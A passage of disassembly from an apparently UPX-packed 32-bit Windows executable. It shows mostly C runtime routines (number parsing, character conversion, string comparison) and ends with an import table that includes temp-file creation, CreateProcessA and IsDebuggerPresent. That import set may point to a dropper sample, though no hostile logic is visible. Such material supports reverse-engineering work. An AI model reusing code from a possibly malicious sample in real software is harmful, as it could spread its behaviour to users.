loc_40AA6E: ; CODE XREF: sub_40A9E3+C6�j
jle short loc_40AACB
cmp esi, 7FFFFFF0h
ja short loc_40AACB
lea eax, [esi+esi+8]
cmp eax, 400h
ja short loc_40AAB2
call sub_40A970
mov eax, esp
cmp eax, edi
jz short loc_40AAC6
mov dword ptr [eax], 0CCCCh
jmp short loc_40AAC3
; ---------------------------------------------------------------------------
loc_40AA96: ; CODE XREF: sub_40A9E3+53�j
; sub_40A9E3+59�j ...
push edi
push edi
push [ebp+var_24]
push [ebp+var_28]
push 1
push [ebp+arg_0]
call ebx ; dword_40C10C
mov esi, eax
cmp esi, edi
jnz short loc_40AA6E
loc_40AAAB: ; CODE XREF: sub_40A9E3+EE�j
xor eax, eax
jmp loc_40AB83
; ---------------------------------------------------------------------------
loc_40AAB2: ; CODE XREF: sub_40A9E3+9E�j
push eax
call sub_404E31
cmp eax, edi
pop ecx
jz short loc_40AAC6
mov dword ptr [eax], 0DDDDh
loc_40AAC3: ; CODE XREF: sub_40A9E3+B1�j
add eax, 8
loc_40AAC6: ; CODE XREF: sub_40A9E3+A9�j
; sub_40A9E3+D8�j
mov [ebp+var_1C], eax
jmp short loc_40AACE
; ---------------------------------------------------------------------------
loc_40AACB: ; CODE XREF: sub_40A9E3:loc_40AA6E�j
; sub_40A9E3+93�j
mov [ebp+var_1C], edi
loc_40AACE: ; CODE XREF: sub_40A9E3+E6�j
cmp [ebp+var_1C], edi
jz short loc_40AAAB
lea eax, [esi+esi]
push eax
push edi
push [ebp+var_1C]
call sub_4021D0
add esp, 0Ch
push esi
push [ebp+var_1C]
push [ebp+var_24]
push [ebp+var_28]
push 1
push [ebp+arg_0]
call ebx ; dword_40C10C
test eax, eax
jz short loc_40AB77
mov ebx, [ebp+var_34]
cmp ebx, edi
jz short loc_40AB1C
push edi
push edi
push [ebp+arg_14]
push ebx
push esi
push [ebp+var_1C]
push edi
push [ebp+arg_4]
call dword_40C0AC ; WideCharToMultiByte
test eax, eax
jz short loc_40AB77
mov [ebp+var_20], ebx
jmp short loc_40AB77
; ---------------------------------------------------------------------------
loc_40AB1C: ; CODE XREF: sub_40A9E3+11A�j
cmp [ebp+var_2C], edi
mov ebx, dword_40C0AC
jnz short loc_40AB3B
push edi
push edi
push edi
push edi
push esi
push [ebp+var_1C]
push edi
push [ebp+arg_4]
call ebx ; dword_40C0AC
mov esi, eax
cmp esi, edi
jz short loc_40AB77
loc_40AB3B: ; CODE XREF: sub_40A9E3+142�j
push esi
push 1
call sub_405413
cmp eax, edi
pop ecx
pop ecx
mov [ebp+var_20], eax
jz short loc_40AB77
push edi
push edi
push esi
push eax
push esi
push [ebp+var_1C]
push edi
push [ebp+arg_4]
call ebx ; dword_40C0AC
cmp eax, edi
jnz short loc_40AB6C
push [ebp+var_20]
call sub_404F20
pop ecx
mov [ebp+var_20], edi
jmp short loc_40AB77
; ---------------------------------------------------------------------------
loc_40AB6C: ; CODE XREF: sub_40A9E3+179�j
cmp [ebp+var_24], 0FFFFFFFFh
jz short loc_40AB77
mov ecx, [ebp+var_30]
mov [ecx], eax
loc_40AB77: ; CODE XREF: sub_40A9E3+113�j
; sub_40A9E3+132�j ...
push [ebp+var_1C]
call sub_40A1C4
pop ecx
loc_40AB80: ; CODE XREF: sub_40A9E3+38�j
mov eax, [ebp+var_20]
loc_40AB83: ; CODE XREF: sub_40A9E3+CA�j
lea esp, [ebp-40h]
pop edi
pop esi
pop ebx
mov ecx, [ebp+var_4]
xor ecx, ebp
call sub_40224A
leave
retn
sub_40A9E3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AB95 proc near ; CODE XREF: sub_40AC4B+81�p
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = byte ptr -6
var_4 = word ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push [ebp+arg_8]
lea ecx, [ebp+var_18]
call sub_407FBB
mov ebx, [ebp+arg_0]
lea eax, [ebx+1]
cmp eax, 100h
ja short loc_40ABC3
mov eax, [ebp+var_18]
mov eax, [eax+0C8h]
movzx eax, word ptr [eax+ebx*2]
jmp short loc_40AC38
; ---------------------------------------------------------------------------
loc_40ABC3: ; CODE XREF: sub_40AB95+1D�j
mov [ebp+arg_0], ebx
sar [ebp+arg_0], 8
lea eax, [ebp+var_18]
push eax
mov eax, [ebp+arg_0]
and eax, 0FFh
push eax
call sub_40A935
test eax, eax
pop ecx
pop ecx
jz short loc_40ABF4
mov al, byte ptr [ebp+arg_0]
push 2
mov [ebp+var_8], al
mov [ebp+var_7], bl
mov [ebp+var_6], 0
pop ecx
jmp short loc_40ABFE
; ---------------------------------------------------------------------------
loc_40ABF4: ; CODE XREF: sub_40AB95+4B�j
xor ecx, ecx
mov [ebp+var_8], bl
mov [ebp+var_7], 0
inc ecx
loc_40ABFE: ; CODE XREF: sub_40AB95+5D�j
mov eax, [ebp+var_18]
push 1
push dword ptr [eax+14h]
push dword ptr [eax+4]
lea eax, [ebp+var_4]
push eax
push ecx
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_18]
push 1
push eax
call sub_40A3DE
add esp, 20h
test eax, eax
jnz short loc_40AC34
cmp [ebp+var_C], al
jz short loc_40AC30
mov eax, [ebp+var_10]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40AC30: ; CODE XREF: sub_40AB95+92�j
xor eax, eax
jmp short loc_40AC48
; ---------------------------------------------------------------------------
loc_40AC34: ; CODE XREF: sub_40AB95+8D�j
movzx eax, [ebp+var_4]
loc_40AC38: ; CODE XREF: sub_40AB95+2C�j
and eax, [ebp+arg_4]
cmp [ebp+var_C], 0
jz short loc_40AC48
mov ecx, [ebp+var_10]
and dword ptr [ecx+70h], 0FFFFFFFDh
loc_40AC48: ; CODE XREF: sub_40AB95+9D�j
; sub_40AB95+AA�j
pop ebx
leave
retn
sub_40AB95 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AC4B proc near ; CODE XREF: sub_40AE76:loc_40AE95�p
var_14 = dword ptr -14h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 14h
push esi
push edi
push [ebp+arg_0]
lea ecx, [ebp+var_14]
call sub_407FBB
mov eax, [ebp+arg_8]
mov esi, [ebp+arg_4]
xor edi, edi
cmp eax, edi
jz short loc_40AC6C
mov [eax], esi
loc_40AC6C: ; CODE XREF: sub_40AC4B+1D�j
cmp esi, edi
jnz short loc_40AC9C
loc_40AC70: ; CODE XREF: sub_40AC4B+5A�j
; sub_40AC4B+60�j
call sub_4053C0
push edi
push edi
push edi
push edi
push edi
mov dword ptr [eax], 16h
call sub_402191
add esp, 14h
cmp [ebp+var_8], 0
jz short loc_40AC95
mov eax, [ebp+var_C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40AC95: ; CODE XREF: sub_40AC4B+41�j
xor eax, eax
jmp loc_40AE72
; ---------------------------------------------------------------------------
loc_40AC9C: ; CODE XREF: sub_40AC4B+23�j
cmp [ebp+arg_C], edi
jz short loc_40ACAD
cmp [ebp+arg_C], 2
jl short loc_40AC70
cmp [ebp+arg_C], 24h
jg short loc_40AC70
loc_40ACAD: ; CODE XREF: sub_40AC4B+54�j
mov ecx, [ebp+var_14]
push ebx
mov bl, [esi]
mov [ebp+var_4], edi
lea edi, [esi+1]
loc_40ACB9: ; CODE XREF: sub_40AC4B+A5�j
cmp dword ptr [ecx+0ACh], 1
jle short loc_40ACD9
lea eax, [ebp+var_14]
push eax
movzx eax, bl
push 8
push eax
call sub_40AB95
mov ecx, [ebp+var_14]
add esp, 0Ch
jmp short loc_40ACE9
; ---------------------------------------------------------------------------
loc_40ACD9: ; CODE XREF: sub_40AC4B+75�j
mov edx, [ecx+0C8h]
movzx eax, bl
movzx eax, byte ptr [edx+eax*2]
and eax, 8
loc_40ACE9: ; CODE XREF: sub_40AC4B+8C�j
test eax, eax
jz short loc_40ACF2
mov bl, [edi]
inc edi
jmp short loc_40ACB9
; ---------------------------------------------------------------------------
loc_40ACF2: ; CODE XREF: sub_40AC4B+A0�j
cmp bl, 2Dh
jnz short loc_40ACFD
or [ebp+arg_10], 2
jmp short loc_40AD02
; ---------------------------------------------------------------------------
loc_40ACFD: ; CODE XREF: sub_40AC4B+AA�j
cmp bl, 2Bh
jnz short loc_40AD05
loc_40AD02: ; CODE XREF: sub_40AC4B+B0�j
mov bl, [edi]
inc edi
loc_40AD05: ; CODE XREF: sub_40AC4B+B5�j
mov eax, [ebp+arg_C]
test eax, eax
jl loc_40AE59
cmp eax, 1
jz loc_40AE59
cmp eax, 24h
jg loc_40AE59
test eax, eax
jnz short loc_40AD50
cmp bl, 30h
jz short loc_40AD34
mov [ebp+arg_C], 0Ah
jmp short loc_40AD68
; ---------------------------------------------------------------------------
loc_40AD34: ; CODE XREF: sub_40AC4B+DE�j
mov al, [edi]
cmp al, 78h
jz short loc_40AD47
cmp al, 58h
jz short loc_40AD47
mov [ebp+arg_C], 8
jmp short loc_40AD68
; ---------------------------------------------------------------------------
loc_40AD47: ; CODE XREF: sub_40AC4B+ED�j
; sub_40AC4B+F1�j
mov [ebp+arg_C], 10h
jmp short loc_40AD5A
; ---------------------------------------------------------------------------
loc_40AD50: ; CODE XREF: sub_40AC4B+D9�j
cmp eax, 10h
jnz short loc_40AD68
cmp bl, 30h
jnz short loc_40AD68
loc_40AD5A: ; CODE XREF: sub_40AC4B+103�j
mov al, [edi]
cmp al, 78h
jz short loc_40AD64
cmp al, 58h
jnz short loc_40AD68
loc_40AD64: ; CODE XREF: sub_40AC4B+113�j
inc edi
mov bl, [edi]
inc edi
loc_40AD68: ; CODE XREF: sub_40AC4B+E7�j
; sub_40AC4B+FA�j ...
mov esi, [ecx+0C8h]
or eax, 0FFFFFFFFh
xor edx, edx
div [ebp+arg_C]
loc_40AD76: ; CODE XREF: sub_40AC4B+19D�j
movzx ecx, bl
movzx ecx, word ptr [esi+ecx*2]
test cl, 4
jz short loc_40AD8A
movsx ecx, bl
sub ecx, 30h
jmp short loc_40ADA4
; ---------------------------------------------------------------------------
loc_40AD8A: ; CODE XREF: sub_40AC4B+135�j
test cx, 103h
jz short loc_40ADC2
mov cl, bl
sub cl, 61h
cmp cl, 19h
movsx ecx, bl
ja short loc_40ADA1
sub ecx, 20h
loc_40ADA1: ; CODE XREF: sub_40AC4B+151�j
add ecx, 0FFFFFFC9h
loc_40ADA4: ; CODE XREF: sub_40AC4B+13D�j
cmp ecx, [ebp+arg_C]
jnb short loc_40ADC2
or [ebp+arg_10], 8
cmp [ebp+var_4], eax
jb short loc_40ADD9
jnz short loc_40ADB8
cmp ecx, edx
jbe short loc_40ADD9
loc_40ADB8: ; CODE XREF: sub_40AC4B+167�j
or [ebp+arg_10], 4
cmp [ebp+arg_8], 0
jnz short loc_40ADE5
loc_40ADC2: ; CODE XREF: sub_40AC4B+144�j
; sub_40AC4B+15C�j
mov eax, [ebp+arg_10]
dec edi
test al, 8
jnz short loc_40ADEA
cmp [ebp+arg_8], 0
jz short loc_40ADD3
mov edi, [ebp+arg_4]
loc_40ADD3: ; CODE XREF: sub_40AC4B+183�j
and [ebp+var_4], 0
jmp short loc_40AE35
; ---------------------------------------------------------------------------
loc_40ADD9: ; CODE XREF: sub_40AC4B+165�j
; sub_40AC4B+16B�j
mov ebx, [ebp+var_4]
imul ebx, [ebp+arg_C]
add ebx, ecx
mov [ebp+var_4], ebx
loc_40ADE5: ; CODE XREF: sub_40AC4B+175�j
mov bl, [edi]
inc edi
jmp short loc_40AD76
; ---------------------------------------------------------------------------
loc_40ADEA: ; CODE XREF: sub_40AC4B+17D�j
test al, 4
mov esi, 7FFFFFFFh
jnz short loc_40AE0E
test al, 1
jnz short loc_40AE35
and eax, 2
jz short loc_40AE05
cmp [ebp+var_4], 80000000h
ja short loc_40AE0E
loc_40AE05: ; CODE XREF: sub_40AC4B+1AF�j
test eax, eax
jnz short loc_40AE35
cmp [ebp+var_4], esi
jbe short loc_40AE35
loc_40AE0E: ; CODE XREF: sub_40AC4B+1A6�j
; sub_40AC4B+1B8�j
call sub_4053C0
test byte ptr [ebp+arg_10], 1
mov dword ptr [eax], 22h
jz short loc_40AE25
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_40AE35
; ---------------------------------------------------------------------------
loc_40AE25: ; CODE XREF: sub_40AC4B+1D2�j
mov al, byte ptr [ebp+arg_10]
and al, 2
neg al
sbb eax, eax
neg eax
add eax, esi
mov [ebp+var_4], eax
loc_40AE35: ; CODE XREF: sub_40AC4B+18C�j
; sub_40AC4B+1AA�j ...
mov eax, [ebp+arg_8]
test eax, eax
jz short loc_40AE3E
mov [eax], edi
loc_40AE3E: ; CODE XREF: sub_40AC4B+1EF�j
test byte ptr [ebp+arg_10], 2
jz short loc_40AE47
neg [ebp+var_4]
loc_40AE47: ; CODE XREF: sub_40AC4B+1F7�j
cmp [ebp+var_8], 0
jz short loc_40AE54
mov eax, [ebp+var_C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40AE54: ; CODE XREF: sub_40AC4B+200�j
mov eax, [ebp+var_4]
jmp short loc_40AE71
; ---------------------------------------------------------------------------
loc_40AE59: ; CODE XREF: sub_40AC4B+BF�j
; sub_40AC4B+C8�j ...
mov eax, [ebp+arg_8]
test eax, eax
jz short loc_40AE62
mov [eax], esi
loc_40AE62: ; CODE XREF: sub_40AC4B+213�j
cmp [ebp+var_8], 0
jz short loc_40AE6F
mov eax, [ebp+var_C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40AE6F: ; CODE XREF: sub_40AC4B+21B�j
xor eax, eax
loc_40AE71: ; CODE XREF: sub_40AC4B+20C�j
pop ebx
loc_40AE72: ; CODE XREF: sub_40AC4B+4C�j
pop edi
pop esi
leave
retn
sub_40AC4B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AE76 proc near ; CODE XREF: sub_40A924+8�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
xor eax, eax
cmp ds:dword_410730, eax
push eax
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
jnz short loc_40AE94
push offset off_40F5B0
jmp short loc_40AE95
; ---------------------------------------------------------------------------
loc_40AE94: ; CODE XREF: sub_40AE76+15�j
push eax
loc_40AE95: ; CODE XREF: sub_40AE76+1C�j
call sub_40AC4B
add esp, 14h
pop ebp
retn
sub_40AE76 endp
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_40A970
loc_40AEA0: ; CODE XREF: sub_40A970+11�j
; UPX0:0040A997�j
push ecx
lea ecx, [esp+4]
sub ecx, eax
sbb eax, eax
not eax
and ecx, eax
mov eax, esp
and eax, 0FFFFF000h
loc_40AEB4: ; CODE XREF: sub_40A970+559�j
cmp ecx, eax
jb short loc_40AEC2
mov eax, ecx
pop ecx
xchg eax, esp
mov eax, [eax]
mov [esp+0], eax
retn
; ---------------------------------------------------------------------------
loc_40AEC2: ; CODE XREF: sub_40A970+546�j
sub eax, 1000h
test [eax], eax
jmp short loc_40AEB4
; END OF FUNCTION CHUNK FOR sub_40A970
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov ecx, [ebp+10h]
or ecx, ecx
jz short loc_40AF2A
mov esi, [ebp+8]
mov edi, [ebp+0Ch]
mov bh, 41h
mov bl, 5Ah
mov dh, 20h
lea ecx, [ecx+0]
loc_40AEEC: ; CODE XREF: UPX0:0040AF19�j
mov ah, [esi]
or ah, ah
mov al, [edi]
jz short loc_40AF1B
or al, al
jz short loc_40AF1B
add esi, 1
add edi, 1
cmp ah, bh
jb short loc_40AF08
cmp ah, bl
ja short loc_40AF08
add ah, dh
loc_40AF08: ; CODE XREF: UPX0:0040AF00�j
; UPX0:0040AF04�j
cmp al, bh
jb short loc_40AF12
cmp al, bl
ja short loc_40AF12
add al, dh
loc_40AF12: ; CODE XREF: UPX0:0040AF0A�j
; UPX0:0040AF0E�j
cmp ah, al
jnz short loc_40AF21
sub ecx, 1
jnz short loc_40AEEC
loc_40AF1B: ; CODE XREF: UPX0:0040AEF2�j
; UPX0:0040AEF6�j
xor ecx, ecx
cmp ah, al
jz short loc_40AF2A
loc_40AF21: ; CODE XREF: UPX0:0040AF14�j
mov ecx, 0FFFFFFFFh
jb short loc_40AF2A
neg ecx
loc_40AF2A: ; CODE XREF: UPX0:0040AEDB�j
; UPX0:0040AF1F�j ...
mov eax, ecx
pop ebx
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_40AF40: ; CODE XREF: UPX0:0040AF6F�j
lea eax, [edx-1]
pop ebx
retn
; ---------------------------------------------------------------------------
align 10h
xor eax, eax
mov al, [esp+8]
push ebx
mov ebx, eax
shl eax, 8
mov edx, [esp+8]
test edx, 3
jz short loc_40AF7D
loc_40AF68: ; CODE XREF: UPX0:0040AF7B�j
mov cl, [edx]
add edx, 1
cmp cl, bl
jz short loc_40AF40
test cl, cl
jz short loc_40AFC6
test edx, 3
jnz short loc_40AF68
loc_40AF7D: ; CODE XREF: UPX0:0040AF66�j
or ebx, eax
push edi
mov eax, ebx
shl ebx, 10h
push esi
or ebx, eax
loc_40AF88: ; CODE XREF: UPX0:0040AFB3�j
; UPX0:0040AFC2�j ...
mov ecx, [edx]
mov edi, 7EFEFEFFh
mov eax, ecx
mov esi, edi
xor ecx, ebx
add esi, eax
add edi, ecx
xor ecx, 0FFFFFFFFh
xor eax, 0FFFFFFFFh
xor ecx, edi
xor eax, esi
add edx, 4
and ecx, 81010100h
jnz short loc_40AFCA
and eax, 81010100h
jz short loc_40AF88
and eax, 1010100h
jnz short loc_40AFC4
and esi, 80000000h
jnz short loc_40AF88
loc_40AFC4: ; CODE XREF: UPX0:0040AFBA�j
; UPX0:0040AFD3�j ...
pop esi
pop edi
loc_40AFC6: ; CODE XREF: UPX0:0040AF73�j
pop ebx
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_40AFCA: ; CODE XREF: UPX0:0040AFAC�j
mov eax, [edx-4]
cmp al, bl
jz short loc_40B007
test al, al
jz short loc_40AFC4
cmp ah, bl
jz short loc_40B000
test ah, ah
jz short loc_40AFC4
shr eax, 10h
cmp al, bl
jz short loc_40AFF9
test al, al
jz short loc_40AFC4
cmp ah, bl
jz short loc_40AFF2
test ah, ah
jz short loc_40AFC4
jmp short loc_40AF88
; ---------------------------------------------------------------------------
loc_40AFF2: ; CODE XREF: UPX0:0040AFEA�j
pop esi
pop edi
lea eax, [edx-1]
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40AFF9: ; CODE XREF: UPX0:0040AFE2�j
lea eax, [edx-2]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40B000: ; CODE XREF: UPX0:0040AFD7�j
lea eax, [edx-3]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40B007: ; CODE XREF: UPX0:0040AFCF�j
lea eax, [edx-4]
pop esi
pop edi
pop ebx
retn
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40B00E proc near ; CODE XREF: sub_4041CE+24�p
; sub_409A2A+10�p ...
jmp dword_40C060
sub_40B00E endp
; ---------------------------------------------------------------------------
lea ecx, [ebp-28h]
jmp loc_401461
; ---------------------------------------------------------------------------
loc_40B01C: ; DATA XREF: sub_401FF5+2�o
; sub_402034+2�o
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-54h]
xor ecx, eax
call sub_40224A
mov eax, offset dword_40DE08
jmp sub_404220
; ---------------------------------------------------------------------------
loc_40B037: ; DATA XREF: sub_406DCE+2�o
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-14h]
xor ecx, eax
call sub_40224A
mov eax, offset dword_40E020
jmp sub_404220
; ---------------------------------------------------------------------------
lea esi, [ebp-230h]
jmp loc_401BEF
; ---------------------------------------------------------------------------
loc_40B05D: ; DATA XREF: sub_4010EC+5�o
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-290h]
xor ecx, eax
call sub_40224A
mov ecx, [edx-4]
xor ecx, eax
call sub_40224A
mov eax, offset dword_40E318
jmp sub_404220
; ---------------------------------------------------------------------------
loc_40B085: ; DATA XREF: sub_401882+2�o
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-1Ch]
xor ecx, eax
call sub_40224A
mov eax, offset dword_40E3A4
jmp sub_404220
; ---------------------------------------------------------------------------
mov ecx, [ebp-10h]
jmp sub_4024AF
; ---------------------------------------------------------------------------
loc_40B0A8: ; DATA XREF: sub_4012D1+2�o
; sub_401826+2�o
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-14h]
xor ecx, eax
call sub_40224A
mov eax, offset dword_40E3D0
jmp sub_404220
; ---------------------------------------------------------------------------
loc_40B0C3: ; DATA XREF: sub_401ADC+2�o
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-24h]
xor ecx, eax
call sub_40224A
mov eax, offset dword_40E428
jmp sub_404220
; ---------------------------------------------------------------------------
loc_40B0DE: ; DATA XREF: sub_401A89+2�o
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-18h]
xor ecx, eax
call sub_40224A
mov eax, offset dword_40E480
jmp sub_404220
; ---------------------------------------------------------------------------
loc_40B0F9: ; DATA XREF: UPX1:0040E4B0�o
jmp nullsub_1
; ---------------------------------------------------------------------------
loc_40B0FE: ; DATA XREF: sub_4017AB+2�o
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-18h]
xor ecx, eax
call sub_40224A
mov eax, offset dword_40E4E0
jmp sub_404220
; ---------------------------------------------------------------------------
lea ecx, [ebp-2Ch]
jmp loc_401461
; ---------------------------------------------------------------------------
loc_40B121: ; DATA XREF: sub_401548+2�o
; sub_401606+2�o
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-58h]
xor ecx, eax
call sub_40224A
mov eax, offset dword_40E50C
jmp sub_404220
; ---------------------------------------------------------------------------
lea esi, [ebp-1Ch]
jmp loc_401436
; =============== S U B R O U T I N E =======================================
sub_40B144 proc near ; CODE XREF: sub_404EFE+14�p
; sub_40556D+23�p
; DATA XREF: ...
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
lea eax, [edx+0Ch]
mov ecx, [edx-24h]
xor ecx, eax
call sub_40224A
mov eax, offset dword_40E538
jmp sub_404220
sub_40B144 endp
; =============== S U B R O U T I N E =======================================
sub_40B15F proc near ; DATA XREF: UPX0:0040C138�o
call sub_401679
and ds:dword_4108C8, 0
push offset loc_40B17C
mov ds:dword_4108C4, eax
call sub_40268D
pop ecx
retn
; ---------------------------------------------------------------------------
loc_40B17C: ; DATA XREF: sub_40B15F+C�o
mov eax, ds:dword_4108C4
push edi
mov edi, [eax]
mov [eax], eax
mov eax, ds:dword_4108C4
mov [eax+4], eax
and ds:dword_4108C8, 0
cmp edi, ds:dword_4108C4
jz short loc_40B1BC
push ebx
push esi
loc_40B19F: ; CODE XREF: sub_40B15F+59�j
mov ebx, [edi]
lea esi, [edi+8]
call sub_4015D0
push edi
call sub_4023DB
cmp ebx, ds:dword_4108C4
pop ecx
mov edi, ebx
jnz short loc_40B19F
pop esi
pop ebx
loc_40B1BC: ; CODE XREF: sub_40B15F+3C�j
push ds:dword_4108C4
call sub_4023DB
and ds:dword_4108C4, 0
pop ecx
pop edi
retn
sub_40B15F endp
; ---------------------------------------------------------------------------
loc_40B1D1: ; DATA XREF: sub_402371+40�o
mov ds:dword_40FE04, offset off_40C174
mov ecx, offset dword_40FE04
jmp sub_4024AF
; ---------------------------------------------------------------------------
align 4
dd 386h dup(0)
dword_40C000 dd 7C812F39h ; resolved to->KERNEL32.GetStdHandle ; sub_406718+1B5�r
dword_40C004 dd 7C8608FFh ; resolved to->KERNEL32.GetTempFileNameAdword_40C008 dd 7C802367h ; resolved to->KERNEL32.CreateProcessAdword_40C00C dd 7C835DCAh ; resolved to->KERNEL32.GetTempPathAdword_40C010 dd 7C801A24h ; resolved to->KERNEL32.CreateFileA ; sub_401E85+27�r
dword_40C014 dd 7C810D87h ; resolved to->KERNEL32.WriteFile ; sub_401E85+115�r ...
dword_40C018 dd 7C80180Eh ; resolved to->KERNEL32.ReadFile ; sub_401E85+47�r
dword_40C01C dd 7C810A09h ; resolved to->KERNEL32.GetFileSizeExdword_40C020 dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_401C1F+114�r ...
dword_40C024 dd 7C810A77h ; resolved to->KERNEL32.GetFileSizedword_40C028 dd 7C810B8Eh ; resolved to->KERNEL32.SetFilePointerdword_40C02C dd 7C832044h ; resolved to->KERNEL32.SetEndOfFiledword_40C030 dd 7C801E16h ; resolved to->KERNEL32.TerminateProcess ; sub_404CDE+FC�r
dword_40C034 dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcess ; sub_404CDE+F5�r
dword_40C038 dd 7C862E2Ah ; resolved to->KERNEL32.UnhandledExceptionFilter ; sub_404CDE+D9�r ...
dword_40C03C dd 7C84467Dh ; resolved to->KERNEL32.SetUnhandledExceptionFilter ; sub_404CDE+CE�r ...
dword_40C040 dd 7C813093h ; resolved to->KERNEL32.IsDebuggerPresent ; sub_404CDE+B9�r
dword_40C044 dd 7C812F1Dh ; resolved to->KERNEL32.GetCommandLineAdword_40C048 dd 7C91043Dh ; resolved to->NTDLL.RtlFreeHeapdword_40C04C dd 7C812ADEh ; resolved to->KERNEL32.GetVersionExAdword_40C050 dd 7C9105D4h ; resolved to->NTDLL.RtlAllocateHeapdword_40C054 dd 7C80ABC1h ; resolved to->KERNEL32.GetProcessHeapdword_40C058 dd 7C801EEEh ; resolved to->KERNEL32.GetStartupInfoA ; sub_406718+15�r
dword_40C05C dd 7C812A09h ; resolved to->KERNEL32.RaiseExceptiondword_40C060 dd 7C937A40h ; resolved to->NTDLL.RtlUnwinddword_40C064 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleA ; sub_404694+39�r ...
dword_40C068 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; sub_40470B+54�r ...
dword_40C06C dd 7C809740h ; resolved to->KERNEL32.TlsGetValue ; sub_40470B+7�r ...
dword_40C070 dd 7C812D9Fh ; resolved to->KERNEL32.TlsAlloc ; sub_404A60:loc_404AFF�r
dword_40C074 dd 7C809BC5h ; resolved to->KERNEL32.TlsSetValue ; sub_404A60+58�r
dword_40C078 dd 7C8136D7h ; resolved to->KERNEL32.TlsFree ; sub_404A60+85�r
dword_40C07C dd 7C809766h ; resolved to->KERNEL32.InterlockedIncrement ; sub_407B43+8�r ...
dword_40C080 dd 7C910340h ; resolved to->NTDLL.RtlSetLastWin32Error ; sub_409843+AB�r
dword_40C084 dd 7C809728h ; resolved to->KERNEL32.GetCurrentThreadId ; sub_404A60+169�r ...
dword_40C088 dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Error ; sub_404F20+79�r ...
dword_40C08C dd 7C80977Ah ; resolved to->KERNEL32.InterlockedDecrement ; sub_407BC9+C�r ...
dword_40C090 dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_405413+25�r ...
dword_40C094 dd 7C9109EDh ; resolved to->NTDLL.RtlSizeHeapdword_40C098 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcessdword_40C09C dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameA ; sub_40652A+2A�r
dword_40C0A0 dd 7C81DF77h ; resolved to->KERNEL32.FreeEnvironmentStringsA ; sub_4065E3+126�r
dword_40C0A4 dd 7C81CF5Bh ; resolved to->KERNEL32.GetEnvironmentStringsAdword_40C0A8 dd 7C814AE7h ; resolved to->KERNEL32.FreeEnvironmentStringsWdword_40C0AC dd 7C80A0D4h ; resolved to->KERNEL32.WideCharToMultiByte ; sub_40A460+216�r ...
dword_40C0B0 dd 7C812F08h ; resolved to->KERNEL32.GetEnvironmentStringsWdword_40C0B4 dd 7C80CC97h ; resolved to->KERNEL32.SetHandleCountdword_40C0B8 dd 7C810E51h ; resolved to->KERNEL32.GetFileType ; sub_406718+1C7�r
dword_40C0BC dd 7C91188Ah ; resolved to->NTDLL.RtlDeleteCriticalSectiondword_40C0C0 dd 7C810EF8h ; resolved to->KERNEL32.HeapDestroydword_40C0C4 dd 7C812BB6h ; resolved to->KERNEL32.HeapCreatedword_40C0C8 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_40C0CC dd 7C80A427h ; resolved to->KERNEL32.QueryPerformanceCounterdword_40C0D0 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCountdword_40C0D4 dd 7C809920h ; resolved to->KERNEL32.GetCurrentProcessIddword_40C0D8 dd 7C8017E5h ; resolved to->KERNEL32.GetSystemTimeAsFileTimedword_40C0DC dd 7C9010EDh ; resolved to->NTDLL.RtlLeaveCriticalSectiondword_40C0E0 dd 7C901005h ; resolved to->NTDLL.RtlEnterCriticalSectiondword_40C0E4 dd 7C812E76h ; resolved to->KERNEL32.GetCPInfo ; sub_4080B7+84�r ...
